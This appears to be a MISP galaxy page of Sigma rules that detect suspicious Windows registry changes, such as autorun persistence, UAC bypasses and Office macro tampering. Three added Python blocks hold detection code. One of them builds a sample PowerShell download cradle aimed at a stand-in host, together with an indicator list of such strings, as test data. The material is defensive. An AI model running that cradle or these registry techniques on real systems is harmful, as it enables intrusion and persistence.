falsepositive ['Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way']
filename registry_set_persistence_mpnotify.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

CurrentControlSet Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID f674e36a-4b91-431e-8aef-f8a96c2aca35 which can be used as unique global reference for CurrentControlSet Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_currentcontrolset.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Potential EventLog File Location Tampering

Detects tampering with the "File" value of an EventLog service channel key in order to change the default location of its .evtx file. This technique is used to interfere with log collection and alerting

Internal MISP references

UUID 0cb8d736-995d-4ce7-a31e-1e8d452a1459 which can be used as unique global reference for Potential EventLog File Location Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author D3F7A5105
creation_date 2023/01/02
falsepositive ['Unknown']
filename registry_set_evtx_file_key_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

Add Debugger Entry To AeDebug For Persistence

Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence; the configured debugger is invoked whenever an application crashes

Internal MISP references

UUID 092af964-4233-4373-b4ba-d86ea2890288 which can be used as unique global reference for Add Debugger Entry To AeDebug For Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/21
falsepositive ['Legitimate use of the key to setup a debugger. Which is often the case on developers machines']
filename registry_set_aedebug_persistence.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Suspicious Application Allowed Through Exploit Guard

Detects applications being added to the "allowed applications" list of Exploit Guard in order to bypass Controlled Folder Access restrictions

Internal MISP references

UUID 42205c73-75c8-4a63-9db1-e3782e06fda0 which can be used as unique global reference for Suspicious Application Allowed Through Exploit Guard in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/05
falsepositive ['Unlikely']
filename registry_set_exploit_guard_susp_allowed_apps.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

System Scripts Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

Internal MISP references

UUID e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1 which can be used as unique global reference for System Scripts Autorun Keys Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
creation_date 2019/10/25
falsepositive ['Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason', 'Legitimate administrator sets up autorun keys for legitimate reason']
filename registry_set_asep_reg_keys_modification_system_scripts.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.
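The three "Autorun Keys Modification" entries above are splits of one rule set, and the Wow6432Node and CurrentControlSet variants exist because the same autostart location shows up under several spellings in Sysmon's TargetObject. The block below is an added example, not code from this page or from the Sigma project: it folds those spellings into one canonical path (HKU\<SID> to HKCU, Wow6432Node removed, ControlSet00N to CurrentControlSet) before checking the write against an ASEP list, and lowers severity for the documented false positive of installers writing autoruns. The ASEP subset, the installer allow-list and the sample events are assumptions constructed for the example; the upstream rules carry much longer lists.

```python
"""Normalise Sysmon registry paths and classify writes against autostart (ASEP) locations."""
import re

# Hive-relative, lower-case ASEP key paths. Illustrative subset (assumption).
ASEP_LOCATIONS = (
    "software\\microsoft\\windows\\currentversion\\run",
    "software\\microsoft\\windows\\currentversion\\runonce",
    "software\\microsoft\\windows nt\\currentversion\\winlogon\\userinit",
    "software\\microsoft\\windows nt\\currentversion\\winlogon\\shell",
    "software\\policies\\microsoft\\windows\\system\\scripts\\startup",
    "software\\policies\\microsoft\\windows\\system\\scripts\\logon",
)

# Images allowed to touch ASEPs without raising severity (assumed, site-specific).
TRUSTED_INSTALLERS = {"c:\\windows\\system32\\msiexec.exe"}

_SID_RE = re.compile(r"^hku\\s-1-5-[0-9-]+\\")          # HKU\<SID>\ is how Sysmon shows HKCU
_CONTROLSET_RE = re.compile(r"\\system\\controlset\d{3}\\")


def canonicalize(target: str) -> str:
    """Lower-case the path and fold the alternative spellings of one key into one:
    HKU\\<SID>\\ -> hkcu\\, \\Wow6432Node\\ removed, ControlSet00N -> CurrentControlSet."""
    t = target.lower()
    t = _SID_RE.sub(lambda m: "hkcu\\", t)
    t = t.replace("\\software\\wow6432node\\", "\\software\\")
    t = _CONTROLSET_RE.sub(lambda m: "\\system\\currentcontrolset\\", t)
    return t


def asep_location(target: str):
    """Return (hive, asep key) when the written value is an ASEP value or lives under an ASEP key."""
    hive, _, rest = canonicalize(target).partition("\\")
    for asep in ASEP_LOCATIONS:
        if rest == asep or rest.startswith(asep + "\\"):
            return hive, asep
    return None


def triage(event: dict):
    """Attach a severity; allow-listed installers are the rule's documented false positive."""
    hit = asep_location(event["TargetObject"])
    if hit is None:
        return None
    hive, asep = hit
    trusted = event["Image"].lower() in TRUSTED_INSTALLERS
    return {"hive": hive, "asep": asep, "details": event["Details"],
            "image": event["Image"], "severity": "info" if trusted else "medium"}


SAMPLE_EVENTS = [  # constructed Sysmon Event ID 13 records
    {"Image": r"C:\Users\Public\u.exe",
     "TargetObject": r"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\Public\u.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup",
     "Details": r"C:\Program Files\Vendor\setup.exe /finish"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",
     "Details": r"C:\Windows\system32\userinit.exe,C:\Users\Public\x.exe"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup\0\0\Script",
     "Details": r"\\fileserver\share\s.bat"},
    {"Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(triage(ev))
```

The matching deliberately requires either an exact value path (Userinit, Shell) or a path beneath the key with a separating backslash, so `RunOnce\Setup` is not mistaken for a child of `Run`. The allow-list only lowers severity; it does not suppress the event, since an installer image name is exactly what a careful adversary would choose.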

RestrictedAdminMode Registry Value Tampering

Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system you connect to using Remote Desktop, so your credentials cannot be harvested during the initial connection if the remote server has been compromised

Internal MISP references

UUID d6ce7ebd-260b-4323-9768-a9631c8d4db2 which can be used as unique global reference for RestrictedAdminMode Registry Value Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/01/13
falsepositive ['Unknown']
filename registry_set_lsa_disablerestrictedadmin.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Potential Persistence Via AppCompat RegisterAppRestart Layer

Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. This can be potentially abused as a persistence mechanism.

Internal MISP references

UUID b86852fb-4c77-48f9-8519-eb1b2c308b59 which can be used as unique global reference for Potential Persistence Via AppCompat RegisterAppRestart Layer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024/01/01
falsepositive ['Legitimate applications making use of this feature for compatibility reasons']
filename registry_set_persistence_app_cpmpat_layer_registerapprestart.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.011']
Related clusters

To see the related clusters, click here.

Lsass Full Dump Request Via DumpType Registry Settings

Detects the "DumpType" registry value being set to "2", which stands for a "Full Dump". Techniques such as LSASS Shtinkering require this value to be "2" in order to dump LSASS.

Internal MISP references

UUID 33efc23c-6ea2-4503-8cfe-bdf82ce8f719 which can be used as unique global reference for Lsass Full Dump Request Via DumpType Registry Settings in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @pbssubhash
creation_date 2022/12/08
falsepositive ['Legitimate application that needs to do a full dump of their process']
filename registry_set_lsass_usermode_dumping.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

DHCP Callout DLL Installation

Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)

Internal MISP references

UUID 9d3436ef-9476-4c43-acca-90ce06bdf33a which can be used as unique global reference for DHCP Callout DLL Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Dimitrios Slamaris
creation_date 2017/05/15
falsepositive ['Unknown']
filename registry_set_dhcp_calloutdll.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Microsoft Office Protected View Disabled

Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.

Internal MISP references

UUID a5c7a43f-6009-4a8c-80c5-32abf1c53ecc which can be used as unique global reference for Microsoft Office Protected View Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/06/08
falsepositive ['Unlikely']
filename registry_set_office_disable_protected_view_features.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Desktop Background Change Via Registry

Detects registry value settings that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.

Internal MISP references

UUID 85b88e05-dadc-430b-8a9e-53ff1cd30aae which can be used as unique global reference for Potentially Suspicious Desktop Background Change Via Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ)
creation_date 2023/12/21
falsepositive ['Administrative scripts that change the desktop background to a company logo or other image.']
filename registry_set_desktop_background_change.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.impact', 'attack.t1112', 'attack.t1491.001']
Related clusters

To see the related clusters, click here.

Hiding User Account Via SpecialAccounts Registry Key

Detects modifications under the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where a value is set to "0" in order to hide a user account from the logon screen.

Internal MISP references

UUID f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd which can be used as unique global reference for Hiding User Account Via SpecialAccounts Registry Key in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2022/07/12
falsepositive ['Unknown']
filename registry_set_special_accounts.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.002']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Shim Database Modification

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.

Internal MISP references

UUID dfb5b4e8-91d0-4291-b40a-e3b0d3942c45 which can be used as unique global reference for Potential Persistence Via Shim Database Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/30
falsepositive ['Legitimate custom SHIM installations will also trigger this rule']
filename registry_set_persistence_shim_database.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.011']
Related clusters

To see the related clusters, click here.

Bypass UAC Using DelegateExecute

Detects a fileless User Account Control bypass that abuses the DelegateExecute registry value

Internal MISP references

UUID 46dd5308-4572-4d12-aa43-8938f0184d4f which can be used as unique global reference for Bypass UAC Using DelegateExecute in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/05
falsepositive ['Unknown']
filename registry_set_bypass_uac_using_delegateexecute.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Modification of IE Registry Settings

Detects modification of the registry settings used by Internet Explorer and by other Windows components that share these settings. An attacker can abuse these keys to add a domain to the Trusted Sites zone or to insert JavaScript for persistence

Internal MISP references

UUID d88d0ab2-e696-4d40-a2ed-9790064e66b3 which can be used as unique global reference for Modification of IE Registry Settings in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/22
falsepositive ['Unknown']
filename registry_set_persistence_ie.yml
level low
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

PowerShell as a Service in Registry

Detects PowerShell code being written to the registry as part of a service definition.

Internal MISP references

UUID 4a5f5a5e-ac01-474b-9b4e-d61298c9df1d which can be used as unique global reference for PowerShell as a Service in Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Natalia Shornikova
creation_date 2020/10/06
falsepositive ['Unknown']
filename registry_set_powershell_as_service.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Enabling COR Profiler Environment Variables

Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.

Internal MISP references

UUID ad89044a-8f49-4673-9a55-cbd88a1b374f which can be used as unique global reference for Enabling COR Profiler Environment Variables in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops)
creation_date 2020/09/10
falsepositive No established falsepositives
filename registry_set_enabling_cor_profiler_env_variables.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1574.012']
Related clusters

To see the related clusters, click here.

Suspicious Printer Driver Empty Manufacturer

Detects a suspicious printer driver installation with an empty Manufacturer value

Internal MISP references

UUID e0813366-0407-449a-9869-a2db1119dc41 which can be used as unique global reference for Suspicious Printer Driver Empty Manufacturer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/07/01
falsepositive ['Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value']
filename registry_set_susp_printer_driver.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1574', 'cve.2021.1675']
Related clusters

To see the related clusters, click here.

New TimeProviders Registered With Uncommon DLL Name

Detects processes setting a new DLL in the DllName value under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders. Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.

Internal MISP references

UUID e88a6ddc-74f7-463b-9b26-f69fc0d2ce85 which can be used as unique global reference for New TimeProviders Registered With Uncommon DLL Name in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/06/19
falsepositive ['Unknown']
filename registry_set_timeproviders_dllname.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1547.003']
Related clusters

To see the related clusters, click here.

Uncommon Extension In Keyboard Layout IME File Registry Value

Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.

Internal MISP references

UUID b888e3f2-224d-4435-b00b-9dd66e9ea1f1 which can be used as unique global reference for Uncommon Extension In Keyboard Layout IME File Registry Value in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/11/21
falsepositive ['IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.']
filename registry_set_ime_non_default_extension.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Suspicious Environment Variable Has Been Registered

Detects the creation, via the registry, of user-specific or system-wide environment variables whose data contains suspicious commands and strings

Internal MISP references

UUID 966315ef-c5e1-4767-ba25-fce9c8de3660 which can be used as unique global reference for Suspicious Environment Variable Has Been Registered in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/20
falsepositive ['Unknown']
filename registry_set_suspicious_env_variables.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence']
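The entry above keys on the data of an environment-variable write rather than on the path, and the content an analyst most wants to see is a PowerShell stager hidden behind -EncodedCommand. The block below is an added example, not code from this page or from the Sigma project: it recognises the user and machine environment-variable locations (assumed paths, with HKU\<SID> standing in for HKCU as Sysmon renders it), decodes any base64 UTF-16LE payload after an -e/-enc/-EncodedCommand switch, and scans both the raw value and the decoded text for an illustrative indicator list. The variable name, the indicator list and the sample events are constructed for the example.

```python
"""Flag environment-variable registry writes that carry PowerShell stagers, decoding -EncodedCommand."""
import base64
import re

# Where user and machine environment variables live (assumed; Sysmon shows HKCU as HKU\<SID>).
ENV_PATHS = (
    re.compile(r"^HKU\\S-1-5-[0-9-]+\\Environment\\(?P<name>[^\\]+)$", re.I),
    re.compile(r"^HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\\(?P<name>[^\\]+)$", re.I),
)
# Illustrative indicator list (assumption); checked against the raw value and the decoded payload.
SUSPICIOUS_TOKENS = ("-enc", "-encodedcommand", "iex ", "invoke-expression",
                     "downloadstring", "frombase64string")
# PowerShell accepts any unambiguous prefix of -EncodedCommand; the payload is base64 of UTF-16LE text.
ENC_RE = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(text: str):
    """Return the decoded -EncodedCommand payload from a command line, or None."""
    m = ENC_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def encoded_command(cmd: str) -> str:
    """Build the base64 form PowerShell expects; used here only to construct sample data."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


def inspect_env_event(event: dict):
    """Return a finding for an environment-variable write whose data looks like a stager."""
    name = None
    for pattern in ENV_PATHS:
        m = pattern.match(event["TargetObject"])
        if m:
            name = m.group("name")
            break
    if name is None:
        return None                      # not an environment-variable write
    details = event["Details"]
    decoded = decode_encoded_command(details)
    haystack = (details + " " + (decoded or "")).lower()
    hits = [tok for tok in SUSPICIOUS_TOKENS if tok in haystack]
    if not hits:
        return None
    return {"variable": name, "indicators": hits, "decoded": decoded, "image": event["Image"]}


STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
SAMPLE_EVENTS = [  # constructed Sysmon Event ID 13 records
    {"Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Environment\upd",   # hypothetical variable name
     "Details": "powershell -nop -w hidden -enc " + encoded_command(STAGER)},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\JAVA_HOME",
     "Details": r"C:\Program Files\Java\jdk-17"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upd",
     "Details": "powershell -nop -w hidden -enc AAAA"},   # a Run key, so out of scope for this check
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(inspect_env_event(ev))
```

Decoding before matching is the point: a rule that only inspects the raw value sees a base64 blob and the `-enc` switch, while the decoded text exposes the download cradle and gives the analyst the URL to pivot on. The size floor in `ENC_RE` keeps `-ExecutionPolicy Bypass` from being mistaken for an encoded payload.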

Change User Account Associated with the FAX Service

Detects a change of the user account associated with the FAX service; running the service under a different account can be abused for privilege escalation.

Internal MISP references

UUID e3fdf743-f05b-4051-990a-b66919be1743 which can be used as unique global reference for Change User Account Associated with the FAX Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/07/17
falsepositive ['Unknown']
filename registry_set_fax_change_service_user.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Disable Administrative Share Creation at Startup

Detects registry changes that disable the automatic creation of administrative shares at startup. Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system

Internal MISP references

UUID c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e which can be used as unique global reference for Disable Administrative Share Creation at Startup in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/16
falsepositive ['Unknown']
filename registry_set_disable_administrative_share.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.005']
Related clusters

To see the related clusters, click here.

Suspicious Shim Database Patching Activity

Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.

Internal MISP references

UUID bf344fea-d947-4ef4-9192-34d008315d3a which can be used as unique global reference for Suspicious Shim Database Patching Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/01
falsepositive ['Unknown']
filename registry_set_persistence_shim_database_susp_application.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.011']
Related clusters

To see the related clusters, click here.

Outlook Security Settings Updated - Registry

Detects changes to the registry values related to Outlook security settings

Internal MISP references

UUID c3cefdf4-6703-4e1c-bad8-bf422fc5015a which can be used as unique global reference for Outlook Security Settings Updated - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/28
falsepositive ['Administrative activity']
filename registry_set_office_outlook_security_settings.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1137']
Related clusters

To see the related clusters, click here.

New Netsh Helper DLL Registered From A Suspicious Location

Detects changes to the Netsh registry key that add a new DLL value pointing to a suspicious location. This change might indicate a persistence attempt by registering a malicious Netsh helper

Internal MISP references

UUID e7b18879-676e-4a0e-ae18-27039185a8e7 which can be used as unique global reference for New Netsh Helper DLL Registered From A Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/11/28
falsepositive ['Unknown']
filename registry_set_netsh_help_dll_persistence_susp_location.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence', 'attack.t1546.007']
Related clusters

To see the related clusters, click here.

Disable Exploit Guard Network Protection on Windows Defender

Detects disabling Windows Defender Exploit Guard Network Protection

Internal MISP references

UUID bf9e1387-b040-4393-9851-1598f8ecfae9 which can be used as unique global reference for Disable Exploit Guard Network Protection on Windows Defender in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/04
falsepositive ['Unknown']
filename registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Office Macros Warning Disabled

Detects registry changes setting the Microsoft Office "VBAWarnings" value to "1", which enables the execution of all macros, whether signed or unsigned.

Internal MISP references

UUID 91239011-fe3c-4b54-9f24-15c86bb65913 which can be used as unique global reference for Office Macros Warning Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/05/22
falsepositive ['Unlikely']
filename registry_set_office_vba_warnings_tamper.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.
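Office security settings live under a versioned, per-application key, so a rule on "VBAWarnings" has to match across versions and applications and should distinguish the user's own key from the Group Policy copy under Policies. The block below is an added example, not code from this page or from the Sigma project: it parses such a write into application, version, scope and setting, converts Sysmon's DWORD rendering to an integer, and reports only VBAWarnings writes with the value 1 that the entry above describes. The key layout, the application list and the sample events are assumptions constructed for the example; the Protected View value in the last sample is illustrative only.

```python
"""Recover application, version and policy scope from Office security-setting registry writes."""
import re

# Office keeps per-application security settings under a versioned key; the
# GPO-managed copy sits under ...\Policies\Microsoft\Office\... (path layout assumed).
OFFICE_SECURITY_RE = re.compile(
    r"\\Software\\(?P<policy>Policies\\)?Microsoft\\Office\\(?P<version>\d+\.\d+)\\"
    r"(?P<app>Word|Excel|PowerPoint|Outlook|Access|Publisher)\\Security\\(?P<setting>.+)$",
    re.I,
)
DWORD_RE = re.compile(r"^DWORD \(0x([0-9a-f]{8})\)$", re.I)   # Sysmon's REG_DWORD rendering


def parse_dword(details: str):
    """Turn Sysmon's 'DWORD (0x00000001)' into an int, or None for non-DWORD data."""
    m = DWORD_RE.match(details)
    return int(m.group(1), 16) if m else None


def parse_office_security_write(event: dict):
    """Split an Office security-setting write into its components, or None if it is not one."""
    m = OFFICE_SECURITY_RE.search(event["TargetObject"])
    if not m:
        return None
    return {
        "app": m.group("app"),
        "version": m.group("version"),
        "scope": "policy" if m.group("policy") else "user",
        "setting": m.group("setting"),
        "value": parse_dword(event["Details"]),
        "image": event["Image"],
    }


def office_macro_findings(events):
    """VBAWarnings == 1 means 'enable all macros' (per the rule above); return those writes."""
    findings = []
    for ev in events:
        info = parse_office_security_write(ev)
        if info and info["setting"].lower() == "vbawarnings" and info["value"] == 1:
            findings.append(info)
    return findings


SID = r"HKU\S-1-5-21-1111-2222-3333-1001"   # Sysmon shows HKCU as HKU\<SID>
SAMPLE_EVENTS = [  # constructed Sysmon Event ID 13 records
    {"Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": SID + r"\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings",
     "Details": "DWORD (0x00000001)"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": SID + r"\Software\Policies\Microsoft\Office\16.0\Excel\Security\VBAWarnings",
     "Details": "DWORD (0x00000001)"},                # Policies copy: typically written by Group Policy
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "TargetObject": SID + r"\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings",
     "Details": "DWORD (0x00000002)"},                # a more restrictive level: not a finding
    {"Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": SID + r"\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableInternetFilesInPV",
     "Details": "DWORD (0x00000001)"},                # parsed, but belongs to the Protected View rule
]

if __name__ == "__main__":
    for f in office_macro_findings(SAMPLE_EVENTS):
        print(f)
```

The scope field is the triage hint: a write under Policies made by the Group Policy client is administration, whereas the same value written under the user's own key by reg.exe or a script is what the entry above is after. Keep the policy case in the output rather than dropping it, because an adversary with local admin can write the Policies key too.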

Potential Persistence Via LSA Extensions

Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass. The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.

Internal MISP references

UUID 41f6531d-af6e-4c6e-918f-b946f2b85a36 which can be used as unique global reference for Potential Persistence Via LSA Extensions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/21
falsepositive ['Unlikely']
filename registry_set_persistence_lsa_extension.yml
level high
logsource.category registry_set
logsource.product windows
tags ['attack.persistence']

Bypass UAC Using Event Viewer

Detects a User Account Control bypass that uses Event Viewer together with the associated Windows Registry modification

Internal MISP references

UUID 674202d0-b22a-4af4-ae5f-2eda1f3da1af which can be used as unique global reference for Bypass UAC Using Event Viewer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/05
falsepositive ['Unknown']
filename registry_set_bypass_uac_using_eventviewer.yml
level high
logsource.category registry_set
logsource.product windows
